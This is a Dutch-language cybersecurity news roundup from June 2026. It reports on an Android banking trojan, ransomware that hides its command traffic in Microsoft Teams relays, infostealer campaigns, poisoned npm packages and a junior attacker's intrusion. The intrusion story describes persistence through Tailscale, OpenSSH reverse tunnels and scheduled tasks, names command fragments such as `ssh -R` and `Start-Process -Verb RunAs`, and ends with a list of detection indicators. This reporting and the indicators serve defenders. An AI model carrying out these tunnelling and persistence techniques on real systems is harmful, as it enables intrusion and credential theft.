Naast externe dreigingen kampen veel organisaties met interne risico’s door anonimisering. Beleid voor eigen apparaten (BYOD), consumentenapplicaties en persoonlijk VPN-gebruik hebben het aantal manieren uitgebreid waarop anoniem verkeer bedrijfsomgevingen kan binnendringen. Ook statelijke actoren die zich voordoen als legitieme werknemers in omgevingen met veel thuiswerk, vormen een risico. In veel gevallen hebben organisaties beperkt inzicht in of werknemers proxydiensten, residentiële netwerken of VPN-tools gebruiken bij toegang tot bedrijfsbronnen. Dit creëert blinde vlekken die traditionele perimetergerichte beveiligingsstrategieën mogelijk niet aanpakken. De Spur-studie valideert deze zorg, waarbij 61% van de respondenten aangeeft matig, enigszins of helemaal niet bezorgd te zijn over de potentiële blootstelling van hun interne netwerk via residentiële proxy’s op apparaten van werknemers of consumentenapplicaties. Naarmate zero-trust architecturen volwassener worden, moeten beveiligingsteams interne proxyactiviteit behandelen als een potentieel risicosignaal, in plaats van aan te nemen dat vertrouwde gebruikers en apparaten automatisch vertrouwd netwerkgedrag impliceren.

Organisaties investeren in technologieën voor intelligentie over IP-adressen, maar hebben moeite om de effectiviteit ervan te kwantificeren. Historisch gezien werd succes vaak gemeten met indicatoren zoals geblokkeerde dreigingen of dekkingsgraad van verrijking. Deze metrische gegevens vangen de operationele waarde echter mogelijk niet volledig. De studie van Spur Intelligence toont aan dat organisaties minder volwassen zijn in het meten van hun inspanningen op het gebied van intelligentie over IP-adressen, en een derde van de bedrijven meet deze helemaal niet. Beveiligingsleiders richten zich steeds meer op resultaten zoals onderzoekstijd, valse positieven en kosten.

 

Bron: Spur Intelligence

17 juni 2026 | Nieuwe Rokarolla banktrojan voor Android richt zich op 217 crypto- en bankapps

Het zLabs onderzoeksteam van mobiel beveiligingsbedrijf Zimperium heeft een nieuwe Android-banktrojan geïdentificeerd, genaamd Rokarolla. Deze zeer invasieve malware is vernoemd naar zijn command-and-control infrastructuur, het servernetwerk dat dreigingsactoren gebruiken om instructies naar geïnfecteerde telefoons te sturen. Volgens de zLabs-onderzoekers is deze trojan ongebruikelijk vanwege de combinatie van financiële fraude met totale apparaatbewaking, en kan het zich richten op maar liefst 217 verschillende cryptocurrency- en bankapplicaties.

De aanvalsketen begint wanneer een gebruiker een malafide website bezoekt, zoals infocontablidades.it.com. Deze pagina's bevatten de malware, verborgen in bestanden die zich voordoen als populaire programma's zoals TikTok of Google Chrome. Wanneer een slachtoffer dit bestand downloadt, wordt eerst een secundaire dropper (secundaire malware) uitgevoerd, vermomd als een Google Play Protect beveiligingstool. Deze dropper is verantwoordelijk voor het misleiden van de gebruiker om de uiteindelijke kwaadaardige payload te installeren.

Eenmaal geïnstalleerd, vraagt de malware om toestemming om Android Accessibility Services te gebruiken. Vervolgens neemt het deze diensten over om het telefoonscherm te monitoren en coördinaten te volgen zonder tussenkomst van de gebruiker. Het vraagt ook om de standaard SMS-handler en standaard oproep-handler van de telefoon te worden voor ononderbroken data-interceptie.

Verder onderzoek heeft uitgewezen dat Rokarolla gebruikmaakt van nep-schermoverlays. Wanneer een slachtoffer een authentieke financiële applicatie opent, vraagt de malware het servereindpunt op om HTML-gebaseerde phishingpagina's op te halen. Deze nep-inlogschermen worden vervolgens direct bovenop de legitieme apps weergegeven. De trojan plaatst zelfs een nep-PIN-prompt over het reguliere vergrendelscherm van de telefoon om wachtwoorden te stelen.

De onderzoekers merkten op dat de malware 137 commando's beschikbaar heeft om de telefoon te bedienen en specifieke achtergrondcode termen, zoals 'and', gebruikt om deze acties te activeren. Via een geautomatiseerde keylogger en UI logger kan de malware tekstberichten lezen, WhatsApp-lijsten stelen, toetsaanslagen volgen en screenshots maken. Met behulp van een surveillancemechanisme op basis van snapshots, genaamd Pseudo-VNC, worden schermen heimelijk gemonitord. Bovendien voert het klembordkaping uit om tekst te wijzigen die door de gebruiker is gekopieerd, waarbij cryptocurrency-portemonnee-adressen tijdens overboekingen worden verwisseld zonder dat het slachtoffer dit merkt.

Om de aanval verborgen te houden, stopt Rokarolla inkomende telefoongesprekken met behulp van commando's en dempt het alle geluiden. Deze stap voorkomt dat slachtoffers waarschuwingsmeldingen horen of fraudepreventiegesprekken van hun bank ontvangen. Het schakelt ook actief echte Google Play Protect beveiligingsscans uit en dwingt het apparaatscherm permanent aan te blijven, zodat de achtergrondacties nooit worden onderbroken.

Het onderzoek toont de veranderende trends in mobiele dreigingen, aangezien cybercriminelen zich niet langer uitsluitend richten op datadiefstal, maar op volledige apparaatovername. Dit is een zorgwekkende trend, omdat het controleren van de audio- en tekstberichten van een telefoon beveiligingsfuncties zoals meerfactorauthenticatie volledig nutteloos maakt.

Randolph Barr, Chief Information Security Officer bij Cequence Security, een API-beveiligings- en botbeheerprovider uit San Francisco, Californië, merkte op dat het dreigingslandschap blijft toenemen, met name het mobiele dreigingslandschap. Alleen al in 2024 waren er meer dan 4 miljoen social engineering aanvallen gericht op mobiele apparaten, werden meer dan 33 miljoen mobiele malware/adware-incidenten geblokkeerd en namen phishingaanvallen aanzienlijk toe. Android blijft te maken krijgen met banktrojans en data-lekkende SDK's, terwijl onveilige app-praktijken zowel Android- als iOS-platforms teisteren. De meeste van deze aanvallen zijn gericht op persoonlijk identificeerbare informatie (PII), inloggegevens en financiële data. Barr waarschuwde dat werkgevers en dienstverleners een derde risicolaag toevoegen, waarbij elke validatieaanvraag een nieuw integratiepunt en een extra aanvalsoppervlak creëert. Slechte actoren zouden werkgeverssystemen kunnen compromitteren, verificatie-API's misbruiken of organisaties kunnen phishen om gevoelige data te oververzamelen en verkeerd te behandelen. Aangezien werkgevers vaak niet hetzelfde niveau van cyberbeveiligingsvolwassenheid hebben als bijvoorbeeld overheidssystemen, kunnen zij de zwakste schakel in de keten worden.

Desondanks is de beste bescherming tegen deze dreigingen het vermijden van links van derden of pop-up advertenties voor het downloaden van bestanden, het weigeren van verzoeken voor toegankelijkheidsservices van ongeverifieerde apps en het nauwlettend in de gaten houden van ongewoon schermgedrag, zoals een apparaat dat weigert uit te schakelen.

 

Bron: Zimperium

17 juni 2026 | DragonForce ransomware gebruikt Microsoft Teams relays voor verborgen C2-verkeer

De DragonForce ransomware-groep maakt misbruik van de relay-infrastructuur van Microsoft Teams om command-and-control (C2) verkeer te verbergen, zo blijkt uit onderzoek. De groep zet hiervoor op maat gemaakte malware in, genaamd 'Backdoor.Turn', die is geschreven in de programmeertaal Go. Deze methode stelt de aanvallers in staat om hun communicatie te maskeren binnen het vertrouwde netwerkverkeer van Microsoft Teams, wat detectie bemoeilijkt.

Backdoor.Turn misbruikt specifiek het Traversal Using Relays around NAT (TURN) protocol. Dit protocol wordt door Microsoft Teams gebruikt om berichten te distribueren wanneer een directe verbinding met een client niet mogelijk is, bijvoorbeeld wanneer clients zich op een privénetwerk bevinden. De malware verkrijgt een anoniem Teams bezoekers-token en maakt tijdens de verbindingsopbouw gebruik van een legitieme Microsoft TURN relay, waarna het verbinding legt met de C2-server van de aanvaller. Voor netwerkverdedigers oogt dit verkeer als legitieme Microsoft Teams communicatie.

De DragonForce ransomware-operatie is al minstens sinds 2023 actief en staat bekend om zijn organisatiestructuur in kartelstijl. De groep wordt ook in verband gebracht met de beruchte Scattered Spider dreigingsgroep. Onderzoekers van cybersecuritybedrijf Symantec observeerden deze techniek in december 2025 tijdens een aanval op een groot dienstenbedrijf in de Verenigde Staten.

Hoewel Praetorian in 2025 al een soortgelijke techniek demonstreerde, genaamd 'Ghost Calls', waarbij tijdelijke TURN-credentials voor Teams en Zoom konden worden gekaapt voor stealthy communicatietunnels, is Backdoor.Turn de eerste bekende malware die daadwerkelijk in het wild wordt misbruikt via Microsoft Teams TURN relays voor C2-operaties. Symantec bevestigt dat Backdoor.Turn de eerste bekende malware is die op deze wijze command-and-control verkeer maskeert.

De aanval begon waarschijnlijk met de exploitatie van een onbekende kwetsbaarheid in een SQL- of MSSQL-server. Nadat de aanvallers toegang hadden verkregen, downloadden ze een ZIP-archief met een legitieme VirtualBox/DbgView executable en een kwaadaardige DLL-file voor sideloading. Vervolgens verstevigden ze hun persistentie, creëerden ze kwaadaardige gebruikers, misbruikten ze het LimitBlankPassword beveiligingsbeleid in Windows voor eenvoudige toegang en wijzigden ze firewallregels.

Daarnaast gebruikten de hackers Bring Your Own Vulnerable Driver (BYOVD) technieken met meerdere drivers, waaronder Huawei’s HWAuidoOs2Ec.sys, Topaz Antifraud wsftprm.sys (CVE-2023-52271), Tower of Fantasy GameDriverx64.sys (CVE-2025-61155) en K7 Security K7RKScan.sys (CVE-2025-1055). Deze technieken stelden hen in staat om privileges op kernelniveau te verkrijgen en beveiligingstools op het systeem te beëindigen. De aanvallers gebruikten ook ABYSSWORKER, een op maat gemaakte kwaadaardige driver die zich voordeed als een legitieme Palo Alto driver.

De Backdoor.Turn remote access trojan (RAT) werd in ‘DbgView64.exe’ geïnjecteerd na de implementatie van de ransomware, wat suggereert dat deze mogelijk bedoeld was voor persistentie of toekomstige toegang. De functionaliteiten van de malware omvatten het uitvoeren van commando's, het creëren van processen, netwerkscans, het vastleggen van TLS-certificaten, het zoeken in LDAP/Active Directory, het verzamelen van websitetitels en het stelen van browsercredentials. Na afronding van de verkenning en het omzeilen van verdedigingsmechanismen, exfiltreerden de aanvallers alle data, implementeerden ze de DragonForce ransomware en versleutelden ze de systemen van het slachtoffer. Symantec benadrukt de uitzonderlijk geavanceerde cybermethoden die in deze campagne zijn gebruikt en heeft een complete lijst met Indicators of Compromise (IoC's) gepubliceerd om verdedigers te helpen dergelijke aanvallen te detecteren en te blokkeren.

 

Bron: Symantec | Bron 2: security.com | Bron 3: hubs.li

17 juni 2026 | Aanvallers richten zich op laptops van ontwikkelaars voor credentials

Aanvallers zien laptops van ontwikkelaars steeds vaker als een rijke bron voor credentials, zo blijkt uit recente analyses. Dit heeft GitGuardian ertoe aangezet om Developer Endpoint Protection te introduceren, een uitbreiding van hun platform voor de beveiliging van secrets en niet-menselijke identiteiten (NHI) naar werkstations van ontwikkelaars. De afgelopen twaalf maanden zijn er diverse campagnes in de toeleveringsketen geweest die zich richtten op het oogsten van credentials van deze machines.

CISOs en IT-leiders heroverwegen momenteel de reikwijdte van endpointbeveiliging en wie hiervoor verantwoordelijk is. Bij recente incidenten in de softwaretoeleveringsketen en SaaS-compromitteringen volgen aanvallers een consistent patroon, ze krijgen toegang tot een ontwikkelaars- of geprivilegieerd endpoint, verzamelen daar credentials die in platte tekst aanwezig zijn, en gebruiken deze vervolgens om lateraal te bewegen naar productiecode, cloud controle vlakken en SaaS applicaties. Het ontwikkelaars-endpoint staat hiermee weer centraal in het verhaal van datalekken, waarbij vooral het dreigingsmodel is verschoven.

Aanvallers hoeven niet langer te jagen op zero-days, omdat ontwikkelaars-endpoints en CI-pijplijnen hen de benodigde credentials al aanreiken. De zelfreplicerende Mini Shai-Hulud worm heeft al meer dan 300 npm- en PyPI-pakketten gecompromitteerd. Andere voorbeelden zijn de Trivy naar LiteLLM campagne en de Vercel blootstelling in april 2026. Al deze incidenten volgden hetzelfde patroon van credentials die op ontwikkelaars- of CI-endpoints waren opgeslagen en op grote schaal werden geoogst.

Een nieuwe klasse van blootstelling verergert het probleem verder. Codeeragenten en MCP servers, die nu standaard zijn op machines van ontwikkelaars en werknemers, genereren credentials die na een sessie blijven bestaan, secrets uit wachtwoordmanagers en kluizen halen, en regelmatig kopieën achterlaten in logbestanden, shellgeschiedenis en IDE caches. Veel organisaties die deze tools gebruiken, hebben geen overzicht van wat deze tools creëren of achterlaten, en bestaande beveiligingstools zijn niet uitgerust om dit te detecteren.

Ken Buckler, onderzoeksdirecteur informatiebeveiliging bij Enterprise Management Associates (EMA), merkt op dat aanvallers hebben ontdekt dat secrets die op endpoints rusten, met name voor niet-menselijke identiteiten (NHI) en API-sleutels, net zo waardevol zijn als gestolen credentials uit Active Directory. Hij stelt dat EDR zich richt op kwaadaardige processen en identiteitsprogramma's secrets pas zien nadat ze zijn gebruikt, waardoor het endpoint een kritiek gat wordt. Organisaties die succesvol zijn in deze strijd, behandelen de ontdekking van secrets op endpoints als een primair beveiligingsprobleem, in plaats van het als een bijzaak aan EDR toe te voegen.

Incidentresponders hanteren drie belangrijke strategieën. Ten eerste behandelen ze elk ontwikkelaars- en geprivilegieerd endpoint als een credential store en inventariseren ze deze dienovereenkomstig. Ten tweede prioriteren ze credentials op basis van de toegang die ze verlenen, en niet op basis van waar ze zijn gevonden. Ten derde verkorten ze de levensduur van alles wat niet kan worden verwijderd. Verdedigers die kunnen antwoorden "wat stond er op deze machine op deze datum" herstellen sneller van een aanval op de toeleveringsketen.

GitGuardian’s Developer Endpoint Protection breidt de detectie van secrets, honeytokens en NHI-dekking uit naar ontwikkelaars- en geprivilegieerde werkstations. In tegenstelling tot endpoint tools die zich richten op kwaadaardige binaire bestanden of de herkomst van pakketten, is Endpoint Protection gebouwd rond de credentials zelf en de AI tools die deze steeds vaker genereren. Elk secret dat op een machine wordt gevonden, wordt gekoppeld aan de productiesystemen die het ontgrendelt en aan elke andere locatie waar hetzelfde credential zich bevindt. Elke codeeragent en MCP server die op het endpoint wordt ontdekt, wordt geïnventariseerd, zodat ongeautoriseerde of kwaadaardige MCP's aan het licht komen voordat ze credentials exfiltreren.

De oplossing is ontworpen voor organisaties die een machine-per-machine overzicht van credentials missen. Endpoint Protection draait als een geplande scan die wordt geïmplementeerd via bestaande MDM tools en voltooit in ongeveer een minuut op de meeste ontwikkelaarsmachines. Het dicht drie gaten die bestaande beveiligingsstacks open laten, herstel aan de bron (redactie van secrets uit shell- en commandogeschiedenis, migratie van actieve credentials naar vaults en lokale secrets managers, en voorkomen dat codeeragenten secrets verspreiden via GitGuardian agent hooks), beperking van de impact (continu jagen op credentials in platte tekst op elk endpoint, scoren op ernst en toegangsbereik, en hoge-risico bevindingen direct naar SOC, SIEM en SOAR pushen), en live detectie van aanvallen (honeytokens activeren zodra een infostealer een credential steelt, en valideren deze automatisch vanaf de laptop, wat beveiligingsteams real-time alerts met rijke attributie geeft).

Eric Fourrier, CEO en mede-oprichter van GitGuardian, merkte op dat de afgelopen maanden nauwelijks een week voorbijging zonder een grote inbreuk waarbij credentials van een laptop werden gestolen. Hun bètaprogrammagegevens tonen een gemiddelde van 150 secrets op laptops van ontwikkelaars, met uitschieters tot in de duizenden. Onder deze secrets zijn private sleutels goed voor 38% van de unieke secrets, terwijl credentials voor cloud, identiteitsproviders en secret management zoals AWS IAM en Hashicorp Vault nog eens 22% toevoegen. Het meest opvallende punt is dat 40% van de secrets wordt gevonden in AI-mappen of logbestanden, wat de impact van de adoptie van AI demonstreert. De scheiding tussen credentials die zich in code en op endpoints bevinden, bestaat niet langer voor aanvallers, en kan ook niet langer bestaan voor verdedigers.

 

Bron: GitGuardian

17 juni 2026 | Miljoenen wachtwoorden gestolen door infostealer malware toegevoegd aan HIBP

Maar liefst 124 miljoen wachtwoorden die buitgemaakt zijn door infostealer malware, evenals 56 miljoen e-mailadressen van gecompromitteerde accounts, zijn onlangs toegevoegd aan de bekende datalekzoekmachine Have I Been Pwned (HIBP). Dit nieuws is bekendgemaakt door HIBP-oprichter Troy Hunt. Via Have I Been Pwned kunnen internetgebruikers controleren of hun e-mailadres voorkomt in een van de vele bekende datalekken.

De recentelijk toegevoegde e-mailadressen en wachtwoorden zijn aangetroffen in zogeheten "stealer logs". Dit zijn specifieke bestanden die worden gegenereerd door infostealer malware. Deze kwaadaardige software is specifiek ontworpen om een breed scala aan inloggegevens te stelen. De stealer logs bevatten gedetailleerde informatie, waaronder de namen van websites waarop slachtoffers inloggen, samen met de bijbehorende gebruikersnamen en wachtwoorden.

Nadat de infostealer malware de data heeft verzameld, wordt deze in een bestand gebundeld en teruggestuurd naar de aanvaller. Vervolgens verschijnt deze gestolen informatie vaak op diverse platforms, zoals Telegram, hackforums of andere online kanalen. Onderzoekers en securitybedrijven slagen er regelmatig in om dergelijke logs te achterhalen en delen deze vervolgens met HIBP, zodat gedupeerden op de hoogte kunnen worden gesteld.

Uit analyse van de 56 miljoen e-mailadressen die in deze stealer logs zijn gevonden, bleek dat 86 procent hiervan al eerder bekend was via andere datalekken die bij Have I Been Pwned zijn geregistreerd. Naast de zoekmachine voor gecompromitteerde e-mailadressen, biedt HIBP ook een aanvullende dienst genaamd "Pwned Passwords". Dit is een uitgebreide verzameling van wachtwoorden en hashes van wachtwoorden die in datalekken zijn aangetroffen. Beheerders van systemen kunnen deze dienst gebruiken om te controleren of hashes van wachtwoorden in hun eigen omgeving overeenkomen met bekende gelekte hashes, wat een belangrijke stap is in het beveiligen van gebruikersaccounts. De recente stealer logs hebben geleid tot de toevoeging van 124 miljoen unieke wachtwoorden aan de Pwned Passwords database.

 

Bron: Troy Hunt / Have I Been Pwned

18 juni 2026 | Crypto Clipper Campagne misbruikt nepreputatie en persberichten

Een onbekende dreigingsactor manipuleert online reputatiesystemen en distributiediensten voor persberichten om kwaadaardige software te verspreiden. Dit blijkt uit recent onderzoek van Check Point Research. De campagne is gericht op het verspreiden van een cryptocurrency klembordkaper, verborgen in bots voor Solana en Pump.fun en voorspellers voor crash-games. Dit duidt erop dat houders van cryptocurrency-tegoeden en online gokkers die op zoek zijn naar snelle winsten, de primaire doelwitten zijn.

De aanvallers maken gebruik van betaalde of gepromote berichten op legitieme nieuwswebsites om aandacht te genereren voor hun 'warez'. Naast deze promotiekanalen beschikt de dreigingsactor over een speciale phishingpagina via WordPress die fungeert als centrale hub. Ook zijn er projecten op GitHub en SourceForge die worden gepromoot door nepaccounts, een kanaal op YouTube en een groep accounts die gecoördineerde activiteit ontplooien op VirusTotal. Het doel hiervan is om kwaadaardige bestanden als veilig te classificeren.

Check Point Research stelt in hun rapport dat de dreigingsactor dezelfde tactieken gebruikt als legitieme merken om buzz te creëren: opgeblazen downloadstatistieken, gecoördineerde vijfsterrenrecensies, tutorialvideo's in influencer-stijl en promotie op platforms die mensen instinctief vertrouwen. Dit resulteert in een economie van nepreputatie die zich uitstrekt over elk platform dat een argeloos slachtoffer zou controleren voordat het op 'downloaden' klikt.

De klembordkaper, gebaseerd op de programmeertaal Rust, richt zich op systemen met zowel Windows als macOS. De malware monitort continu het klembord op inhoud die overeenkomt met het patroon van een cryptocurrency wallet-adres. Wanneer een overeenkomst wordt gevonden, vervangt de malware het wallet-adres door een adres dat door aanvallers wordt beheerd en dat is afkomstig van een vaste lijst. Hierdoor worden de digitale activa effectief naar de aanvallers doorgesluisd.

Een opvallend aspect van deze campagne is het gebruik van Ghost Networks om reputatiegedreven systemen zoals VirusTotal te beïnvloeden. Dit gebeurt met het doel om de argwaan te verminderen en het vertrouwen van slachtoffers in de kwaadaardige bestanden te vergroten door een combinatie van upvotes en zeer positieve reacties. Dit gedrag is ook waargenomen op GitHub, waar de dreigingsactor minstens zes GitHub-accounts beheert om hun malware onderling te promoten en te verspreiden. Deze kunstmatig versterkte signalen zijn ontworpen om gebruikers een vals gevoel van veiligheid en vertrouwen te geven. Eén zo'n repository had bijvoorbeeld 146 sterren en 62 forks.

Op SourceForge bereikte de downloadteller 44.485, waarbij een verdachte 37.460 downloads zogenaamd afkomstig waren van apparaten met Android, ondanks dat de ontwikkelaar alleen versies voor Windows en macOS aanbood. Een aannemelijke verklaring hiervoor is het gebruik van een Android farm om het aantal downloads op SourceForge kunstmatig op te drijven.

Misschien wel het meest ongebruikelijke aspect van de campagne is het gebruik van een distributiedienst voor persberichten, zoals EIN Presswire, om de vermeende mogelijkheden van hun tool te promoten. Het persbericht is vervolgens via de partnernieuwswebsites van de dienst verspreid, voornamelijk via het USA TODAY Network. Check Point Research waarschuwt dat het manipuleren van sentiment en reputatie op crowd-sourced platforms een belangrijke verschuiving markeert in de manier waarop aanvallers vertrouwen opbouwen. Dezelfde tactieken van nepreputatie en agressieve cross-platform promotie kunnen in de toekomst gemakkelijk informatiestelers of ransomware verspreiden naar doelwitten met hogere waarde.

 

Bron: Check Point Research | Bron 2: research.checkpoint.com | Bron 3: world.einnews.com

18 juni 2026 | Britse cyberchef waarschuwt voor staatshacks op kritieke infrastructuur

Richard Horne, de topman van het National Cyber Security Centre (NCSC) van het Verenigd Koninkrijk, heeft gewaarschuwd dat Groot-Brittannië zich reeds in de beginfase van toekomstige conflicten in cyberspace bevindt. Hij onthulde dat statelijke actoren verantwoordelijk zijn voor driekwart van de cyberaanvallen op de kritieke nationale infrastructuur van het land.

Horne meldde dat zijn teams in het afgelopen jaar, tot mei, meer dan 200 incidenten hebben behandeld die de kritieke infrastructuur en het ondersteunende ecosysteem raakten. Ongeveer 75 procent hiervan wordt toegeschreven aan statelijke aanvallers. Deze cijfers bouwen voort op eerdere mededelingen van Horne dat het NCSC wekelijks vier nationaal significante cyberincidenten behandelt, waarvan de meerderheid wordt herleid tot vermoedelijke vijandige regeringen in plaats van criminele hackers.

Tijdens de jaarlijkse veiligheidslezing van het Royal United Services Institute benadrukte Horne dat zijn organisatie "regelmatig inbreuken vindt en stopt, voordat hun intentie duidelijk wordt." Hij waarschuwde dat "kinetische doelwitten in elk toekomstig conflict gebaseerd zullen zijn op vandaag verzamelde inlichtingen" en dat tegenstanders zich "positioneren" binnen de Britse kritieke infrastructuur. Horne beschreef deze dreigingen als het "vestigen van voet aan de grond in technologie die de kritieke nationale infrastructuur ondersteunt, wat snelle exploitatie mogelijk zou kunnen maken om massale verstoring te veroorzaken in tijden van conflict." Hij noemde Volt Typhoon, de aan een Chinese staat gelinkte campagne tegen de Amerikaanse infrastructuur, als een duidelijk voorbeeld van deze tactiek. Specifieke details over de Britse inbreuken werden niet gegeven, deels om de daders niet onbedoeld te helpen.

De toespraak van Horne markeerde een opvallende verschuiving in het taalgebruik van het NCSC. Hij stelde dat cyberbeveiliging niet langer behandeld moet worden als een "risico" dat beheerd en getolereerd moet worden, maar als een "strijd" die gevoerd moet worden. Dit nieuwe vocabulaire sluit aan bij een bredere trend onder Westerse regeringen en NAVO, die cyberspace als een permanent betwiste omgeving beschouwen. Horne benadrukte dat de vraag "wanneer zijn we klaar met investeren in cyberbeveiliging?" beantwoord moet worden met "nooit." Het vergelijken van verdedigingen met industriële concurrenten is volgens hem een onvoldoende benadering; de enige relevante maatstaf is de vergelijking met de tegenstander.

Daarnaast waarschuwde Horne dat kunstmatige intelligentie (AI) de dreiging zal verscherpen. Een recente NCSC-analyse acht het "zeer waarschijnlijk" dat tegen 2028 tools met AI zullen worden gebruikt om bekende zwaktes in verouderde technologie binnen kritieke infrastructuur te misbruiken. Deze herijking van de dreiging komt terwijl de Britse regering werkt aan de Cyber Security and Resilience Bill, die regelgeving zal introduceren om verbeteringen af te dwingen bij exploitanten van essentiële diensten. Een nieuw Nationaal Cyber Actieplan staat gepland voor publicatie begin juli. Horne concludeerde: "In deze grote strijd zijn er geen toeschouwers, we staan allemaal op het veld. Als we collectief de strijd omarmen, de urgentie begrijpen en geloven dat we een match zijn voor elke tegenstander, dan kunnen en zullen we overwinnen."

 

Bron: recordedfuture.com

18 juni 2026 | Junior hacker gebruikte Tailscale en OpenSSH voor aanhoudende toegang

Een Franstalige aanvaller, bekend onder het alias "Poisson", infiltreerde een klein Frans autobedrijf, installeerde een keylogger en wist bank- en e-mailgegevens te stelen. De operatie, die 33 dagen duurde en 339 commando's omvatte, werd volledig vastgelegd door Cato Networks. Wat deze inbraak opmerkelijk maakt, is de methode die de aanvaller gebruikte om toegang te behouden, zelfs nadat zijn command-and-control (C2) server offline ging.

Voordat de Havoc C2-server niet meer bereikbaar was, installeerde Poisson OpenSSH en Tailscale op een van de slachtoffersystemen. Dit creëerde een alternatieve toegangsweg die volledig onafhankelijk was van de C2. Toen de Havoc server de volgende dag offline ging, bleef de toegang van de aanvaller behouden. Achttien dagen later kwam de C2 weer online en de agents maakten automatisch opnieuw verbinding, waarna de aanvaller zijn activiteiten voortzette.

Cato Networks, via onderzoeker Vitaly Simonovich, publiceerde een gedetailleerde analyse van de inbraak, mogelijk gemaakt doordat de operator zijn SSH-sleutels en een stapsgewijs draaiboek in een openbaar opslagbucket had achtergelaten. Dit bood een zeldzaam inzicht in een cyberaanval vanuit het perspectief van de aanvaller. De belangrijkste les die de onderzoekers trekken, is dat het offline halen van een C2-server geen volledige remediëring is als de aanvaller al een afzonderlijk toegangskanaal heeft gecreëerd.

Poisson wordt beschreven als een junior operator, wiens activiteitenpatroon deed denken aan een schoolrooster, voornamelijk actief na 15:00 uur CET met een lange onderbreking midden op de dag. Hij maakte gebruik van gratis diensten zoals DuckDNS en Backblaze B2, en een goedkope IONOS VPS in Berlijn. Zijn methoden waren niet geavanceerd; hij lekte zijn home directory vijf keer en faalde in ongeveer de helft van zijn pogingen, maar wist desondanks vier machines te compromitteren.

De malware draaide grotendeels in het geheugen. Een VBScript-stager met een sandbox-ontwijkingsvertraging ontsleutelde een PowerShell-loader, die op zijn beurt een .NET-loader ophaalde die de Havoc's Demon-agent uitvoerde zonder deze naar de schijf te schrijven. Voor privilege-escalatie gebruikte hij `Start-Process -Verb RunAs`, wat een UAC-prompt genereert en handmatige bevestiging vereist. Op één systeem waren hiervoor een dozijn pogingen over twee dagen nodig.

Verdere persistentie werd bewerkstelligd via een geplande taak met de hoogste privileges die bij elke aanmelding werd uitgevoerd, shellcode geïnjecteerd in Explorer.exe, en een aangepaste RustDesk-installatie als back-upkanaal. De keylogger was een Python-script van zeventig regels dat toetsaanslagen naar een lokaal bestand schreef, zonder beacon of exfil-server. De aanvaller logde handmatig in om het bestand op te halen en gebruikte `powercfg` om te voorkomen dat de machines in slaapstand gingen.

De kritieke stap vond plaats op 7 april, toen Poisson in een vijf uur durende sessie OpenSSH Server en Tailscale installeerde, de slachtoffermachine aan zijn privé netwerk van Tailscale koppelde en sleutelgebaseerde SSH met een reverse tunnel configureerde. Hierdoor kon hij de machine bereiken via Tailscale's versleutelde mesh, zonder C2 en zonder blootgestelde poorten.

De aanval was gericht op het stelen van gevoelige gegevens zoals banklogins, e-mailwachtwoorden en inloggegevens voor overheidsportalen. Hoewel hij documenten zoals belastingaangiften en verzekeringspapieren bekeek, was er geen indicatie van laterale beweging, ransomware of diefstal van deze documenten.

De gebruikte tools zijn niet nieuw. APT31 gebruikte Tailscale in 2024 en 2025 voor tunneling, en Scattered Spider maakt gebruik van legitieme remote-access tools zoals Ngrok en Fleetdeck. RustDesk, gebruikt als back-upkanaal, duikt op in recente Akira ransomware-inbraken. De binaries zijn legitiem en ondertekend, waardoor detectie die zich beperkt tot kwaadaardige bestanden deze aanvallen mist.

Cato Networks adviseert organisaties om alert te zijn op:

*   Installatie van OpenSSH Server op een Windows-werkstation, wat zelden legitiem is.

*   Aanwezigheid van `tailscale.exe` op machines die geen reden hebben om een VPN te draaien.

*   `ssh -R` reverse tunnels die naar externe hosts leiden.

*   `wscript.exe` dat .vbs-bestanden uitvoert vanuit staging-mappen van gebruikers.

*   Geplande taken ingesteld op de hoogste privileges die script-interpreters starten.

*   `powercfg` standby-timeout wijzigingen die machines wakker houden.

De bredere les is om bij het detecteren van een C2-server aan te nemen dat dit niet de enige toegangsweg is, en actief te zoeken naar verborgen persistentielagen.

 

Bron: Cato Networks

18 juni 2026 | Mastra npm-packages besmet met infostealer malware via gehackt account

Een aanzienlijk aantal Mastra npm-packages is voorzien van infostealer malware nadat een account van een voormalige contributor werd gecompromitteerd. Mastra, een framework voor de ontwikkeling, het testen en het uitrollen van AI-agents en -applicaties, zag meer dan 140 van zijn packages geïnfecteerd raken. De aanval werd ontdekt door diverse cybersecuritybedrijven.

De infostealer malware is erop gericht om gevoelige informatie te stelen, waaronder browsergeschiedenis en opgeslagen data van meer dan 160 browser extensies voor cryptowallets. Een opmerkelijk aspect van de malware is het gebruik van unieke payloads, specifiek ontworpen voor Linux, macOS en Windows besturingssystemen. Bovendien installeert de malware een persistentiemechanisme, waardoor het ook na een herstart van het systeem actief blijft.

Volgens cybersecuritybedrijf SafeDep werd het account van een voormalige Mastra contributor gehackt. Dit account was al zestien maanden inactief, maar beschikte nog steeds over uitgebreide rechten, wat de aanvallers in staat stelde de malafide packages te publiceren.

In reactie op de aanval adviseert cybersecuritybedrijf Socket eigenaren van 'high-value' cryptowallets om uit voorzorg hun digitale activa over te hevelen naar een nieuwe wallet. Ook StepSecurity, JFrog en Microsoft hebben analyses van de aanval gepubliceerd, inclusief Indicators of Compromise (IOCs). Deze IOCs kunnen organisaties en ontwikkelaars gebruiken om te controleren of hun systemen zijn gecompromitteerd. Microsoft raadt specifiek aan om onmiddellijk terug te vallen op oudere, veilige versies van de packages en gebruik te maken van lockfiles voor afhankelijkheidsbeheer.

 

Bron: Socket | Bron 2: stepsecurity.io | Bron 3: research.jfrog.com

18 juni 2026 | Toename phishingaanvallen en blootstelling werknemersdata bij Fortune 100-bedrijven

Nieuw onderzoek van SpyCloud toont een aanzienlijke toename in phishingaanvallen, zowel in volume als in complexiteit, gericht op grote ondernemingen. Kunstmatige intelligentie (AI) en phishing als dienst (PhaaS) platforms stellen dreigingsactoren in staat om op grote schaal zeer effectieve campagnes te lanceren.

Het "2026 Phishing Pulse Report", dat op 17 juni 2026 werd gepubliceerd, is gebaseerd op een enquête onder beveiligingsprofessionals van organisaties met meer dan 1.000 werknemers. SpyCloud constateerde dat 78% van deze organisaties de afgelopen twaalf maanden een toename zag in het volume van phishingaanvallen. Bovendien gaf 84% aan dat door AI gegenereerde phishingaanvallen steeds gangbaarder worden of moeilijker te verdedigen zijn.

Uit aanvullende analyse van SpyCloud blijkt dat werknemersdata van 86% van de Fortune 100-bedrijven het afgelopen jaar is blootgesteld door phishingaanvallen. Technologiebedrijven werden het zwaarst getroffen, gevolgd door de luchtvaart- en auto-industrie. Deze bevindingen suggereren dat, hoewel organisaties de groeiende dreiging van phishing erkennen, velen onvoldoende voorbereid zijn om te reageren wanneer een aanval slaagt.

